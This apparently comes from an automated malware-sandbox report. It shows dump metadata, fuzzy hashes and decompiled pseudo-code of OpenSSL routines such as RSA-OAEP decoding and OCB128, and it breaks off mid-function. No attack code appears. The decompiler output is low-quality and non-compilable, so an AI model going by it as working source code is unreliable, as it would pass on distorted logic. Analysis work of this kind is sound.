                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $0$gfff
                                                              • API String ID: 0-3930087101
                                                              • Opcode ID: 5c51db951ea2f876e7235b853388be60cb02c27a0c49ba69c33b5e39e40fc11d
                                                              • Instruction ID: a5267448ba1436465acb373c5aa85e758cc452bb07628537df264bfe44a97297
                                                              • Opcode Fuzzy Hash: 5c51db951ea2f876e7235b853388be60cb02c27a0c49ba69c33b5e39e40fc11d
                                                              • Instruction Fuzzy Hash: 9812D2B2E0C3029BDB159E28C94036BB7E4EB96754F2409ADE8C5A3751FF31DD048B82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 24%
                                                              			E00BB9070(void* __ebp, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, char _a44, char _a108, signed int _a172, signed int _a180, intOrPtr _a184, intOrPtr _a188, intOrPtr _a192, signed int _a196, signed int _a200, signed int _a204, signed int _a208, signed int _a212) {
                                                              				signed int _v0;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t79;
                                                              				signed int _t82;
                                                              				signed int _t83;
                                                              				signed int _t90;
                                                              				signed int _t91;
                                                              				void* _t98;
                                                              				void* _t100;
                                                              				void* _t103;
                                                              				signed int _t104;
                                                              				signed int _t118;
                                                              				signed int* _t125;
                                                              				signed int _t128;
                                                              				signed int _t145;
                                                              				signed int _t148;
                                                              				void* _t150;
                                                              				signed int _t159;
                                                              				signed int _t161;
                                                              				intOrPtr _t165;
                                                              				signed int _t168;
                                                              				signed int _t169;
                                                              				signed int _t170;
                                                              				signed int _t176;
                                                              				signed int _t177;
                                                              				void* _t179;
                                                              
                                                              				E00C6BB10(0xb0);
                                                              				_t79 =  *0xcc5970; // 0x851ab4dd
                                                              				_a172 = _t79 ^ _t176;
                                                              				_t151 = _a200;
                                                              				_t128 = _a196;
                                                              				_t165 = _a192;
                                                              				_t161 = _a212;
                                                              				_t159 = 0;
                                                              				_a36 = _a180;
                                                              				_t82 = _a208;
                                                              				_a16 = _a188;
                                                              				_a32 = _a200;
                                                              				_a4 = _t82;
                                                              				_a20 = _t161;
                                                              				_a12 = 0xffffffff;
                                                              				_a8 = 0;
                                                              				_v0 = 0;
                                                              				_a24 = 0;
                                                              				if(_t82 == 0) {
                                                              					_t82 = E00BBBEA0();
                                                              					_a4 = _t82;
                                                              				}
                                                              				if(_t161 == _t159) {
                                                              					_a20 = _t82;
                                                              				}
                                                              				_t83 = E00B97480(_t82);
                                                              				_t177 = _t176 + 4;
                                                              				_a28 = _t83;
                                                              				if(_a184 <= _t159 || _t165 <= _t159) {
                                                              					_t84 = _t83 | 0xffffffff;
                                                              				} else {
                                                              					if(_t128 < _t165) {
                                                              						L25:
                                                              						_push(0xec);
                                                              						_push("crypto\\rsa\\rsa_oaep.c");
                                                              						_push(0x79);
                                                              						goto L26;
                                                              					} else {
                                                              						_t23 = _t83 + 2; // 0x2
                                                              						if(_t128 < _t83 + _t23) {
                                                              							goto L25;
                                                              						} else {
                                                              							_push(0x99);
                                                              							_t161 = _t128 - _t83 - 1;
                                                              							_push("crypto\\rsa\\rsa_oaep.c");
                                                              							_t90 = E00BA33F0(_t161);
                                                              							_push(0x9a);
                                                              							_push("crypto\\rsa\\rsa_oaep.c");
                                                              							_v0 = _t90;
                                                              							_t91 = E00BA33F0(_t128);
                                                              							_t177 = _t177 + 0x18;
                                                              							_t159 = _t91;
                                                              							_a24 = _t159;
                                                              							if(_v0 == 0 || _t159 == 0) {
                                                              								_push(0x9c);
                                                              								_push("crypto\\rsa\\rsa_oaep.c");
                                                              								_push(0x41);
                                                              								L26:
                                                              								_push(0x99);
                                                              								_push(4);
                                                              								E00B98310(_t159);
                                                              								_t179 = _t177 + 0x14;
                                                              							} else {
                                                              								E00C6BB40(_t159, _t159, 0, _t128);
                                                              								E00C6B7A0(_t128 - _t165 + _t159, _t159, _t161, _t128 - _t165 + _t159, _a16, _t165);
                                                              								_t94 =  *_t159 & 0x000000ff;
                                                              								_t128 = _a28;
                                                              								_t30 = _t94 - 1; // -1
                                                              								_push(_a20);
                                                              								_t168 = _t30 >> 0x0000001f &  !( *_t159 & 0x000000ff) >> 0x0000001f;
                                                              								_t31 = _t159 + 1; // 0x1
                                                              								_push(_t161);
                                                              								_t159 = _t128 + _t159 + 1;
                                                              								_push(_t159);
                                                              								_t151 =  &_a44;
                                                              								_push(_t128);
                                                              								_push( &_a44);
                                                              								_t169 =  ~_t168;
                                                              								_a16 = _t31;
                                                              								_a40 = _t159;
                                                              								_t98 = E00BB8D10(_t169);
                                                              								_t179 = _t177 + 0x2c;
                                                              								if(_t98 == 0) {
                                                              									_t159 = 0;
                                                              									if(_t128 > 0) {
                                                              										_t150 = _a16 -  &_a44;
                                                              										do {
                                                              											 *(_t179 + _t159 + 0x3c) =  *(_t179 + _t159 + 0x3c) ^  *(_t150 + _t179 + _t159 + 0x3c);
                                                              											_t159 = _t159 + 1;
                                                              										} while (_t159 < _t128);
                                                              									}
                                                              									_t151 = _v0;
                                                              									_push(_a20);
                                                              									_push(_t128);
                                                              									_push( &_a44);
                                                              									_push(_t161);
                                                              									_push(_v0);
                                                              									_t100 = E00BB8D10(_t169);
                                                              									_t179 = _t179 + 0x14;
                                                              									if(_t100 == 0) {
                                                              										if(_t161 > 0) {
                                                              											_t125 = _v0;
                                                              											_t159 = _a40 - _t125;
                                                              											_t148 = _t161;
                                                              											do {
                                                              												 *_t125 =  *_t125 ^  *(_t125 + _t159);
                                                              												_t125 =  &(_t125[0]);
                                                              												_t148 = _t148 - 1;
                                                              											} while (_t148 != 0);
                                                              										}
                                                              										_t151 = _a204;
                                                              										_t103 = E00BBBC10(_t128, _t169, _a32, _a204,  &_a108, 0, _a4, 0);
                                                              										_t179 = _t179 + 0x18;
                                                              										if(_t103 != 0) {
                                                              											_t151 = _v0;
                                                              											_t104 = E00BA3A50(_v0,  &_a108, _t128);
                                                              											_t159 = _a28;
                                                              											_t55 = _t104 - 1; // -1
                                                              											_t170 = _t169 &  ~(_t55 >> 0x0000001f &  !_t104 >> 0x0000001f);
                                                              											_t177 = _t179 + 0xc;
                                                              											_t128 = 0;
                                                              											_a4 = _t170;
                                                              											while(_t159 < _t161) {
                                                              												_t145 =  *(_t159 + _v0) & 0x000000ff;
                                                              												_t59 = (_t145 ^ 0x00000001) - 1; // -2
                                                              												_t151 =  ~(_t59 >> 0x0000001f &  !(_t145 ^ 0x00000001) >> 0x0000001f);
                                                              												_t118 =  !_t128 & _t151;
                                                              												_t128 = _t128 | _t151;
                                                              												_t61 = _t145 - 1; // -2
                                                              												_a8 =  !_t118 & _a8 | _t118 & _t159;
                                                              												_t170 = _a4 & ( ~(_t61 >> 0x0000001f &  !_t145 >> 0x0000001f) | _t128);
                                                              												_t159 = _t159 + 1;
                                                              												_a4 = _t170;
                                                              											}
                                                              											if((_t170 & _t128) == 0) {
                                                              												goto L25;
                                                              											} else {
                                                              												_t108 = _a8 + 1;
                                                              												_t161 = _t161 - _a8 + 1;
                                                              												_a12 = _t161;
                                                              												if(_a184 >= _t161) {
                                                              													_t151 = _a36;
                                                              													E00C6B7A0(_t128, _t159, _t161, _a36, _t108 + _v0, _t161);
                                                              													_t179 = _t177 + 0xc;
                                                              												} else {
                                                              													E00B98310(_t159, 4, 0x99, 0x6d, "crypto\\rsa\\rsa_oaep.c", 0xdf);
                                                              													_t177 = _t177 + 0x14;
                                                              													_a12 = 0xffffffff;
                                                              													goto L25;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					_push(0xee);
                                                              					_push("crypto\\rsa\\rsa_oaep.c");
                                                              					E00BA3490(_v0);
                                                              					_push(0xef);
                                                              					_push("crypto\\rsa\\rsa_oaep.c");
                                                              					E00BA3490(_a24);
                                                              					_t84 = _a12;
                                                              					_t177 = _t179 + 0x18;
                                                              				}
                                                              				return E00C69C26(_t84, _t128, _a172 ^ _t177, _t151, _t159, _t161);
                                                              			}

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\rsa\rsa_oaep.c
                                                              • API String ID: 2102423945-3183921844
                                                              • Opcode ID: 281310ac8bc1da9a3f021e37fde1c44f3b430590c29f7442861fa8ee86678359
                                                              • Instruction ID: f04d12f7b35b6ae06f92a0c79c36f19bb16125c866a630f8a5dd25294fbfb683
                                                              • Opcode Fuzzy Hash: 281310ac8bc1da9a3f021e37fde1c44f3b430590c29f7442861fa8ee86678359
                                                              • Instruction Fuzzy Hash: E191D2B1648341AFD320DF68CC81FAFB7E5EBC8704F404A6DF695D7281DAB099058B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\modes\ocb128.c
                                                              • API String ID: 2102423945-214209448
                                                              • Opcode ID: c0de6bdec50645460f91c76f976876b380d8166fe82c1e45db7c5532388a80a6
                                                              • Instruction ID: 74222cba9376155d9d368179e6e47b811c0a1300235d093375fdf4bce26ce2bb
                                                              • Opcode Fuzzy Hash: c0de6bdec50645460f91c76f976876b380d8166fe82c1e45db7c5532388a80a6
                                                              • Instruction Fuzzy Hash: A2416D3100D7A2ABC711CF29D041B97FBE4AF96704F14888DE0D45B692C2B5FA09CBA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E00BB40F0(unsigned int* _a4, unsigned int* _a8) {
                                                              				void* __edi;
                                                              				unsigned int* _t33;
                                                              				unsigned int* _t34;
                                                              				unsigned int* _t35;
                                                              				unsigned int* _t36;
                                                              				unsigned int* _t38;
                                                              				unsigned int* _t39;
                                                              				unsigned int* _t40;
                                                              				unsigned int* _t41;
                                                              				unsigned int* _t42;
                                                              				unsigned int* _t43;
                                                              				unsigned int* _t44;
                                                              				unsigned int* _t46;
                                                              				unsigned int* _t47;
                                                              				unsigned int _t53;
                                                              				unsigned int _t61;
                                                              				unsigned int _t63;
                                                              				unsigned int _t65;
                                                              				unsigned int _t67;
                                                              				unsigned int* _t88;
                                                              				unsigned int* _t89;
                                                              				unsigned int* _t90;
                                                              				unsigned int* _t91;
                                                              				unsigned int* _t92;
                                                              				unsigned int* _t93;
                                                              				unsigned int* _t94;
                                                              				unsigned int* _t96;
                                                              				unsigned int* _t97;
                                                              				void* _t99;
                                                              
                                                              				_t88 = _a8;
                                                              				_t53 = _t88[0x16];
                                                              				_t89 =  &(_t88[6]);
                                                              				 *((char*)(_t89 + _t53)) = 0x80;
                                                              				_t54 = _t53 + 1;
                                                              				if(_t53 + 1 > 0x38) {
                                                              					E00C6BB40(_t88, _t54 + _t89, 0, 0x40 - _t54);
                                                              					_push(1);
                                                              					_push(_t89);
                                                              					_push(_t88);
                                                              					_t54 = 0;
                                                              					E00BCA800();
                                                              					_t99 = _t99 + 0x18;
                                                              				}
                                                              				E00C6BB40(_t88, _t54 + _t89, 0, 0x38 - _t54);
                                                              				_t89[0xe] = _t88[4] & 0x000000ff;
                                                              				_t90 =  &(_t89[0xe]);
                                                              				_t90[0] = _t88[4] & 0x000000ff;
                                                              				_t91 =  &(_t90[0]);
                                                              				_t91[0] = _t88[4] & 0x000000ff;
                                                              				_t92 =  &(_t91[0]);
                                                              				_t92[0] = _t88[4] & 0x000000ff;
                                                              				_t93 =  &(_t92[0]);
                                                              				_t93[0] = _t88[5] & 0x000000ff;
                                                              				_t94 =  &(_t93[0]);
                                                              				_t94[0] = _t88[5] & 0x000000ff;
                                                              				_t96 =  &(_t94[0]);
                                                              				 *_t96 = _t88[5] & 0x000000ff;
                                                              				_t97 =  &(_t96[0]);
                                                              				 *_t97 = _t88[5] & 0x000000ff;
                                                              				_push(1);
                                                              				_push(_t97 - 0x3f);
                                                              				_push(_t88);
                                                              				E00BCA800();
                                                              				_t88[0x16] = 0;
                                                              				E00BA39E0(_t97 - 0x3f, 0x40);
                                                              				_t61 =  *_t88;
                                                              				_t33 = _a4;
                                                              				 *_t33 = _t61;
                                                              				_t34 =  &(_t33[0]);
                                                              				 *_t34 = _t61 >> 8;
                                                              				_t35 =  &(_t34[0]);
                                                              				 *_t35 = _t61 >> 0x10;
                                                              				_t36 =  &(_t35[0]);
                                                              				 *_t36 = _t61 >> 0x18;
                                                              				_t63 = _t88[1];
                                                              				_t36[0] = _t63;
                                                              				_t38 =  &(_t36[0]);
                                                              				 *_t38 = _t63 >> 8;
                                                              				_t39 =  &(_t38[0]);
                                                              				 *_t39 = _t63 >> 0x10;
                                                              				_t40 =  &(_t39[0]);
                                                              				 *_t40 = _t63 >> 0x18;
                                                              				_t65 = _t88[2];
                                                              				_t41 =  &(_t40[0]);
                                                              				 *_t41 = _t65;
                                                              				_t42 =  &(_t41[0]);
                                                              				 *_t42 = _t65 >> 8;
                                                              				_t43 =  &(_t42[0]);
                                                              				 *_t43 = _t65 >> 0x10;
                                                              				_t44 =  &(_t43[0]);
                                                              				 *_t44 = _t65 >> 0x18;
                                                              				_t67 = _t88[3];
                                                              				_t44[0] = _t67;
                                                              				_t46 =  &(_t44[0]);
                                                              				 *_t46 = _t67 >> 8;
                                                              				_t47 =  &(_t46[0]);
                                                              				 *_t47 = _t67 >> 0x10;
                                                              				_t47[0] = _t67 >> 0x18;
                                                              				return 1;
                                                              			}

































                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: 9a87ab689afa0e2c381a49084cd72cac18ca1241c17c9dcc8a57c48f59368db1
                                                              • Instruction ID: 8dbbf00a59f4c1a4ef150deb04a48d4cb9dec50b6c73fb178fa4073298ef9438
                                                              • Opcode Fuzzy Hash: 9a87ab689afa0e2c381a49084cd72cac18ca1241c17c9dcc8a57c48f59368db1
                                                              • Instruction Fuzzy Hash: 2C41F65010D7D25FD31A8A3E0CC0A66BF96DFB7100B0886DDE8D69BB87C564A896C7F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: 7d853e3eb07e464758e4851624055ef26b56abfb4c18282043259d47c4ec4342
                                                              • Instruction ID: a85e392672660d4143dd17d31b3124b0df7c69ea0ab3112e29ea4aa162974ad0
                                                              • Opcode Fuzzy Hash: 7d853e3eb07e464758e4851624055ef26b56abfb4c18282043259d47c4ec4342
                                                              • Instruction Fuzzy Hash: 53819C715087419FD728CF29C491A6BBBE4FFC8314F448A6EE4DA87651D730EA48CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 22%
                                                              			E00B9CFE0(void* __ebp, signed char _a3, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int* _a48, signed char _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t77;
                                                              				signed char _t80;
                                                              				signed int _t82;
                                                              				intOrPtr _t83;
                                                              				void* _t92;
                                                              				signed int* _t93;
                                                              				signed int* _t98;
                                                              				signed int _t110;
                                                              				signed int _t111;
                                                              				void* _t123;
                                                              				signed int _t130;
                                                              				signed int _t131;
                                                              				intOrPtr _t133;
                                                              				signed int _t140;
                                                              				unsigned int _t143;
                                                              				signed int _t146;
                                                              				signed int* _t148;
                                                              				void* _t149;
                                                              				signed int _t151;
                                                              				intOrPtr* _t153;
                                                              				void* _t155;
                                                              				signed int _t157;
                                                              
                                                              				_t149 = __ebp;
                                                              				E00C6BB10(0x2c);
                                                              				_t77 =  *0xcc5970; // 0x851ab4dd
                                                              				_a40 = _t77 ^ _t157;
                                                              				_t107 = _a52;
                                                              				_t148 = _a48;
                                                              				_t131 = _t148[0xb];
                                                              				_a12 = _a56;
                                                              				_t80 =  *_t148;
                                                              				_a20 = _a64;
                                                              				_t110 = _t148[0xa];
                                                              				_a3 = _t80;
                                                              				_a16 = _t110;
                                                              				_a4 = _t131;
                                                              				if((_t80 & 0x00000040) == 0) {
                                                              					 *_t110(_t148,  &(_t148[4]), _t131);
                                                              					_t80 = _a3;
                                                              					_t157 = _t157 + 0xc;
                                                              					_t148[8] = _t148[8] + 1;
                                                              					asm("adc dword [esi+0x24], 0x0");
                                                              				}
                                                              				_t82 = _t80 & 7;
                                                              				_t133 = 0xf - _t82;
                                                              				 *_t148 = _t82;
                                                              				_t83 = 0xf;
                                                              				_t111 = 0;
                                                              				_a8 = 0xf;
                                                              				if(0xf < 0xf) {
                                                              					do {
                                                              						_t130 = _t111 |  *(_t148 + _t83) & 0x000000ff;
                                                              						 *(_t148 + _t83) = 0;
                                                              						_t83 = _t83 + 1;
                                                              						_t111 = _t130 << 8;
                                                              					} while (_t83 < 0xf);
                                                              				}
                                                              				_t84 = _t148[3] & 0x000000ff;
                                                              				_t146 = _a60;
                                                              				_t148[3] = 1;
                                                              				if((_t111 | _t148[3] & 0x000000ff) == _t146) {
                                                              					_t148[8] = _t148[8] + ((_t146 + 0x0000000f | 0x00000008) >> 3);
                                                              					asm("adc dword [esi+0x24], 0x0");
                                                              					__eflags = _t148[9] - 0x20000000;
                                                              					if(__eflags < 0) {
                                                              						L11:
                                                              						_push(_t149);
                                                              						_t151 = _t146 >> 4;
                                                              						__eflags = _t151;
                                                              						if(_t151 == 0) {
                                                              							L14:
                                                              							__eflags = _t146;
                                                              							if(_t146 != 0) {
                                                              								_t92 = 0;
                                                              								__eflags = _t146;
                                                              								if(_t146 > 0) {
                                                              									do {
                                                              										 *(_t148 + _t92 + 0x10) =  *(_t148 + _t92 + 0x10) ^  *(_t107 + _t92);
                                                              										_t92 = _t92 + 1;
                                                              										__eflags = _t92 - _t146;
                                                              									} while (_t92 < _t146);
                                                              								}
                                                              								_t153 = _a16;
                                                              								_t93 =  &(_t148[4]);
                                                              								 *_t153(_t93, _t93, _a4);
                                                              								 *_t153(_t148,  &_a24, _a4);
                                                              								_t157 = _t157 + 0x18;
                                                              								_t123 = 0;
                                                              								__eflags = _t146;
                                                              								if(_t146 > 0) {
                                                              									_t155 = _t107 -  &_a24;
                                                              									_t140 = _a12 -  &_a24;
                                                              									__eflags = _t140;
                                                              									do {
                                                              										_t98 = _t157 + _t123 + 0x28;
                                                              										_t107 =  *(_t98 + _t155) ^  *_t98;
                                                              										_t123 = _t123 + 1;
                                                              										 *(_t98 + _t140) =  *(_t98 + _t155) ^  *_t98;
                                                              										__eflags = _t123 - _t146;
                                                              									} while (_t123 < _t146);
                                                              								}
                                                              								goto L21;
                                                              							}
                                                              						} else {
                                                              							_a20(_t107, _a12, _t151, _a4, _t148,  &(_t148[4]));
                                                              							_t143 = _t151 << 4;
                                                              							_a12 = _a12 + _t143;
                                                              							_t157 = _t157 + 0x18;
                                                              							_t107 = _t107 + _t143;
                                                              							_t146 = _t146 - _t143;
                                                              							__eflags = _t146;
                                                              							if(_t146 == 0) {
                                                              								L21:
                                                              								_t133 = _a8;
                                                              							} else {
                                                              								__eflags = _t143 >> 4;
                                                              								E00B9CFA0(_t148, _t143 >> 4);
                                                              								_t133 = _a8;
                                                              								goto L14;
                                                              							}
                                                              						}
                                                              						__eflags = _t133 - 0x10;
                                                              						if(_t133 < 0x10) {
                                                              							__eflags = 0x10;
                                                              							E00C6BB40(_t146, _t148 + _t133, 0, 0x10 - _t133);
                                                              							_t157 = _t157 + 0xc;
                                                              						}
                                                              						_a16( &_a24, _a4);
                                                              						_t148[4] = _t148[4] ^ _a24;
                                                              						_t148[5] = _t148[5] ^ _a28;
                                                              						_t148[7] = _t148[7] ^ _a36;
                                                              						_t148[6] = _t148[6] ^ _a32;
                                                              						 *_t148 = _a3;
                                                              						__eflags = 0;
                                                              						return E00C69C26(0, _t107, _a40 ^ _t157 + 0x0000000c, _a3, _t146, _t148, _t148);
                                                              					} else {
                                                              						if(__eflags > 0) {
                                                              							L10:
                                                              							__eflags = _a40 ^ _t157;
                                                              							return E00C69C26(0xfffffffe, _t107, _a40 ^ _t157, _t133, _t146, _t148);
                                                              						} else {
                                                              							__eflags = _t148[8];
                                                              							if(_t148[8] <= 0) {
                                                              								goto L11;
                                                              							} else {
                                                              								goto L10;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					return E00C69C26(_t84 | 0xffffffff, _t107, _a40 ^ _t157, _t133, _t146, _t148);
                                                              				}
                                                              			}




























                                                              0x00b9d103
                                                              0x00b9d108
                                                              0x00b9d10d
                                                              0x00000000
                                                              0x00b9d10d
                                                              0x00b9d101
                                                              0x00b9d17a
                                                              0x00b9d17d
                                                              0x00b9d184
                                                              0x00b9d18d
                                                              0x00b9d192
                                                              0x00b9d192
                                                              0x00b9d1a0
                                                              0x00b9d1a8
                                                              0x00b9d1af
                                                              0x00b9d1ba
                                                              0x00b9d1bd
                                                              0x00b9d1cc
                                                              0x00b9d1d2
                                                              0x00b9d1dc
                                                              0x00b9d0b3
                                                              0x00b9d0b3
                                                              0x00b9d0bd
                                                              0x00b9d0c7
                                                              0x00b9d0d1
                                                              0x00b9d0b5
                                                              0x00b9d0b5
                                                              0x00b9d0b9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9d0b9
                                                              0x00b9d0b3
                                                              0x00b9d087
                                                              0x00b9d099
                                                              0x00b9d099

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 410fb0ae2311d2d737292acce14efb9efda0ba66e7acb74dde3bb45d68b4de34
                                                              • Instruction ID: 15345c722a83a69ee68ed920998c199286a7e7f26444fc94d46dd7c9536ca2f1
                                                              • Opcode Fuzzy Hash: 410fb0ae2311d2d737292acce14efb9efda0ba66e7acb74dde3bb45d68b4de34
                                                              • Instruction Fuzzy Hash: D161B2721087409FC718CF29C89166BBBE5EFC9310F444A6EF4CA87251D730E949CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: dde2d3d5800538196e0dfdcde06d3f1417afb7c0616ccc847a13b2c2f3dffb1c
                                                              • Instruction ID: 651ad4b87f9805a2297577e33b1dfe45a46721001ef3cf6aba5ab6a26dcc7fcf
                                                              • Opcode Fuzzy Hash: dde2d3d5800538196e0dfdcde06d3f1417afb7c0616ccc847a13b2c2f3dffb1c
                                                              • Instruction Fuzzy Hash: E3615A716087419FC718CF29C491A6BBBE5FFD9304F448A6DF49A87242D630EA49CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 15%
                                                              			E00B9D1E0(intOrPtr __edi, void* __ebp, signed char _a3, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int* _a52, intOrPtr _a56, intOrPtr _a60, unsigned int _a64, signed int _a68) {
                                                              				void* __ebx;
                                                              				void* __esi;
                                                              				signed int _t71;
                                                              				signed int _t74;
                                                              				signed int _t76;
                                                              				intOrPtr _t77;
                                                              				void* _t89;
                                                              				signed int* _t90;
                                                              				signed char _t98;
                                                              				intOrPtr _t100;
                                                              				void* _t102;
                                                              				signed int _t104;
                                                              				signed int _t105;
                                                              				signed int* _t112;
                                                              				signed char _t114;
                                                              				signed int _t120;
                                                              				signed int* _t129;
                                                              				unsigned int _t131;
                                                              				intOrPtr _t133;
                                                              				signed int _t135;
                                                              				intOrPtr _t136;
                                                              				void* _t138;
                                                              				signed int* _t140;
                                                              				unsigned int _t142;
                                                              				signed int _t143;
                                                              				void* _t146;
                                                              
                                                              				_t133 = __edi;
                                                              				E00C6BB10(0x30);
                                                              				_t71 =  *0xcc5970; // 0x851ab4dd
                                                              				_a44 = _t71 ^ _t143;
                                                              				_t122 = _a68;
                                                              				_t140 = _a52;
                                                              				_t98 =  *_t140;
                                                              				_a12 = _a56;
                                                              				_t74 = _t140[0xa];
                                                              				_a8 = _a60;
                                                              				_t104 = _t140[0xb];
                                                              				_a24 = _a68;
                                                              				_a3 = _t98;
